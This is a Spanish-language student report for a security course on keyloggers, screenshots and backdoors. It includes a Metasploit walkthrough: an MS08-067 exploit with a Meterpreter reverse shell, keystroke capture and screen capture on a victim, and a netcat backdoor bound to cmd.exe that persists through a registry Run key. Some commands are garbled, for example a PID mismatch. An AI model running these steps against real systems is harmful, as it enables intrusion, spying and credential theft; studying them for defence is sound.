TEMA: Ataque Informatico Keylogger,screenshot,bavkdoor Docente: Carlos Montes Alumna:Angelica Tomala Torres

1. Nombre: Angélica Tomala Torres.<br />Curso: S7k<br />Docente: Carlos Montes.<br />Materia: seguridad Informática.<br />Screenshot<br />Una captura de pantalla (también llamada pantallazo, o Screenshot en inglés) es una imagen tomada por una computadora para registrar los elementos visibles en el monitor u otro dispositivo de salida visual. Generalmente es una imagen digital tomada por el sistema operativo o aplicaciones siendo ejecutadas en la computadora, pero puede ser también una captura hecha por un dispositivo externo como una cámara o algún otro dispositivo interceptando la salida de video de la computadora.<br /> <br />Keylogger<br />Un Keylogger (derivado del bronx: key (tecla) y logger (registrador); registrador de teclas) es un tipo de software que se encarga de registrar las pulsaciones que se realizan en el teclado, para memorizarlas en un fichero y/o enviarlas a través de internet.<br />Suele usarse como malware del tipo daemon, permitiendo que otros usuarios tengan acceso a contraseñas importantes, como los números de una tarjeta de crédito, u otro tipo de información privada que se quiera obtener.<br />El registro de lo que se teclea puede hacerse tanto con medios de hardware como de software. Los sistemas comerciales disponibles incluyen dispositivos que pueden conectarse al cable del teclado (lo que los hace inmediatamente disponibles pero visibles si un usuario revisa el teclado) y al teclado mismo (que no se ven pero que se necesita algún conocimiento de como soldarlos para instalarlos en el teclado). Escribir aplicaciones para realizar keylogging es trivial y, como cualquier programa computacional, puede ser distribuido a través de un troyano o como parte de un virus informático o gusano informático. Se dice que se puede utilizar un teclado virtual para evitar esto, ya que sólo requiere clics del ratón. Sin embargo, las aplicaciones más nuevas también registran Screenshot (capturas de pantalla) al realizarse un click, que anulan la seguridad de esta medida.<br />Funcionamiento<br />El registro de las pulsaciones del teclado se puede alcanzar por medio de hardware y de software:<br />Keylogger con software<br />Enganchados: Estos Keylogger registran las pulsaciones de las teclas del teclado con las funciones proporcionadas por el sistema operativo. El sistema operativo activa el Keylogger en cualquier momento en que se presione una tecla, y realiza el registro.<br />En algunas computadoras podemos darnos cuenta si están infectadas por un keylogger (dependiendo de la velocidad y uso de CPU de nuestro procesador) por el hecho de que el programa registrara cada una de nuestras teclas de la siguiente manera: FicheroLog = FicheroLog + UltimaTecla, este evento será ejecutado por el keylogger cada vez que el usuario presione una tecla. Si bien este evento no será una carga relevante para nuestro procesador si se ejecuta a una velocidad normal, pero si mantienes unas 10 teclas presionadas por unos 30 segundos con la palma de tu mano y tu sistema se congela o su funcionamiento es demasiado lento podríamos sospechar que un Keylogger se ejecuta sobre nuestro computador. Otro signo de que un Keylogger se está ejecutando en nuestro computador es el problema de la tilde doble (´´) al presionar la tecla para acentuar vocales, salen dos tildes seguidas y la vocal sin acentuar. Esto ocurre en keyloggers configurados para otros idiomas. El problema desaparece al eliminarlo.<br />Comandos y terminos básicos<br />payload ----> Tipo de accion la cual se va a realizar si es explotada la vulnerabilidada<br />exploits ----> Programa para explotar la vulnerabilidad<br />encoders ----> Algoritmos de ayuda<br />auxiliary ---> Modulos o tools de msf<br />set -----> Definir valor<br />use -----> Definir exploit<br />run -----> modo de ejecutar los auxiliarys<br />sessions ---> mostrar / iniciar sessiones obtenidas con el metasploit<br />Meterpreter: es un payload avanzado que se incluye en el Metasploit Framework. Su objetivo es proporcionar a los complejos y las características avanzadas que de otro modo sería tedioso para aplicar estrictamente en el montaje. La forma en que se lleva a cabo esto es permitiendo a los desarrolladores escribir sus propias extensiones en forma de objeto compartido (DLL) que pueden cargar y se inyecta en un proceso que se ejecuta en un equipo de destino después de la explotación se ha producido.<br />Introduccion a metasploit<br /> En el Shell escribimos<br />/pentest/exploits/framework3<br />./msfconsole<br />Este es el entorno visual del program. ahora, vamos a llamar al exploit que utilizaremos:<br />use exploit/windows/smb/ms08_067_netapi<br />luego especificamos la IP del ordenador a atacar y del que va atacar:<br />set RHOST direccionIP<br />set LHOST direccionIP<br />ejemplo: set RHOST 192.138.60.1<br />seleccionamos el payload:<br />set PAYLOAD windows/meterpreter/reverse_tcp<br />ahora ejecutamos el exploit:<br />exploit<br />Al poco tiempo veremos si nos hemos conectado satisfactoriamente a la victima:<br />Ahora podemos iniciar el keylogger; pero antes miraremos los procesos que se estan ejecutando en el ordenador victima; ejecutamos:<br />ps<br />y nos saldra esto por ejemplo:<br />Citar<br />Process list============PID Name Path--- ---- ----368 smss.exe SystemRootSystem32smss.exe548 csrss.exe ??C:WINDOWSsystem32csrss.exe576 winlogon.exe ??C:WINDOWSsystem32winlogon.exe656 services.exe C:WINDOWSsystem32services.exe668 lsass.exe C:WINDOWSsystem32lsass.exe824 svchost.exe C:WINDOWSsystem32svchost.exe840 cmd.exe C:WINDOWSsystem32cmd.exe892 svchost.exe C:WINDOWSsystem32svchost.exe988 svchost.exe C:WINDOWSSystem32svchost.exe1040 svchost.exe C:WINDOWSsystem32svchost.exe1128 svchost.exe C:WINDOWSsystem32svchost.exe1384 wuauclt.exe C:WINDOWSsystem32wuauclt.exe1512 spoolsv.exe C:WINDOWSsystem32spoolsv.exe1632 Explorer.EXE C:WINDOWSExplorer.EXE1684 alg.exe C:WINDOWSSystem32alg.exe1700 wscntfy.exe C:WINDOWSsystem32wscntfy.exe1800 ctfmon.exe C:WINDOWSsystem32ctfmon.exe1908 inetinfo.exe C:WINDOWSsystem32inetsrvinetinfo.exe1936 metsvc.exe C:WINDOWSTEMPLsMhsBTbmetsvc.exemeterpreter > <br />Observamos que el proceso Explorer.exe tiene un PID (Process ID) de 1632, entonces mudaremos nuestra herramienta a ese proceso: <br />migrate 316<br />Activamos el keylogger:<br />keyscan_start<br />Ahora procedemos a cambiar de texto parar ver si en verdad esta registrando lo que nosotros tecleamos en el notepad.<br />y queremos ver lo que esta escribiendo la victima:<br />keyscan_dump<br />si queremos una captura de pantalla escribiremos lo siguiente; <br />use espia<br />con el comando “use espia” cargamos el modulo y luego utilizando el comando screenshot seguido del nombre que le queramos capturaremos una imagen del escritorio remoto<br />luego usamos:<br />screenshot [Ruta_Archivo_Salida]<br />ejemplo: screenshot /imagen.bmp<br />si todo a salido bien obtendremos una imagen del escritorio “la imagen queda guardada en la ruta que nos muestra meterpreter como lo vemos en la imagen”<br />BackDoor <br />1.- verifiquemos que no exista en el pc remoto ninguna clave dentro de registro de Windows además de verificar que no exista el archivo llamado nc.exe “Netcat”.<br />Verifiquemos que realmente se elimino.<br />Ahora vamos a ver en el registro de Windows<br />Como vemos no existe ninguna entrada dentro de la clave currentversionrun<br />En el Shell escribimos<br />/pentest/exploits/framework3<br />./msfconsole<br />Este es el entorno visual del program. ahora, vamos a llamar al exploit que utilizaremos:<br />use exploit/windows/smb/ms08_067_netapi.<br />Show option<br />6.-veriquemos cual es la ip de la victima<br />7.- set RHOST 192.168.0.3<br />8.- set payload Windows/meterprete/bind_tcp<br />9.- show options<br />10.- exploit<br />11.- upload c:windowssystem32nc.exe c:windowssystem32<br />12.- reg setval –k HKLMsoftwareMicrosoftwindowsCurrentversionRun –d ¨C:indowsystem32c.exe –l –d –p 1234 cmd.exe<br />13.- vamos a reiniciar windows osea la victim con reboot<br />14.- exit<br />15.- escribimos back<br />16.- connect 192.168.0.3.1234<br />17._ ipconfig <br />En conclusión:<br />Los keyloggers no representan una amenaza para el sistema mismo. Sin embargo, pueden significar una seria amenaza para los usuarios ya que pueden usarse para interceptar contraseñas y otro tipo de información confidencial ingresada a través del teclado. Como resultado, los ciberdelincuentes pueden obtener códigos PIN y números de cuentas de sistemas de pagos en línea, contraseñas para cuentas de usuarios de juegos en línea, direcciones de correo electrónico, nombres de usuario, contraseñas de correo electrónico, etcétera.<br />Por eso siempre debemos de estar pendiente de los ataques ya sea Keylogger, Screenshot, backdoor o otros etc. Porque por medio de esto nos pueden estar vigilando lo que estamos haciendo e incluso por medio de Keylogger nos están capturando lo que nosotros tecleamos y con el Screenshot nos captura lo que estamos haciendo.<br />Por eso para que esto no nos afecte lo que tenemos que hacerle a nuestro Windows es hacerlo indestructible para que nadie nos pueda atacar con ningún tipo de ataque y tomar medida preventiva como por ejemplo: <br />Usar un antivirus estándar que pueda ser adaptado para la detección de programas potencialmente maliciosos (opción preconfigurada en muchos productos), la protección proactiva protegerá el sistema contra nuevas modificaciones de keyloggers existentes.<br />Uso de un teclado virtual o de un sistema para generar contraseñas de uso único para protegerse contra programas y dispositivos keylogger.<br />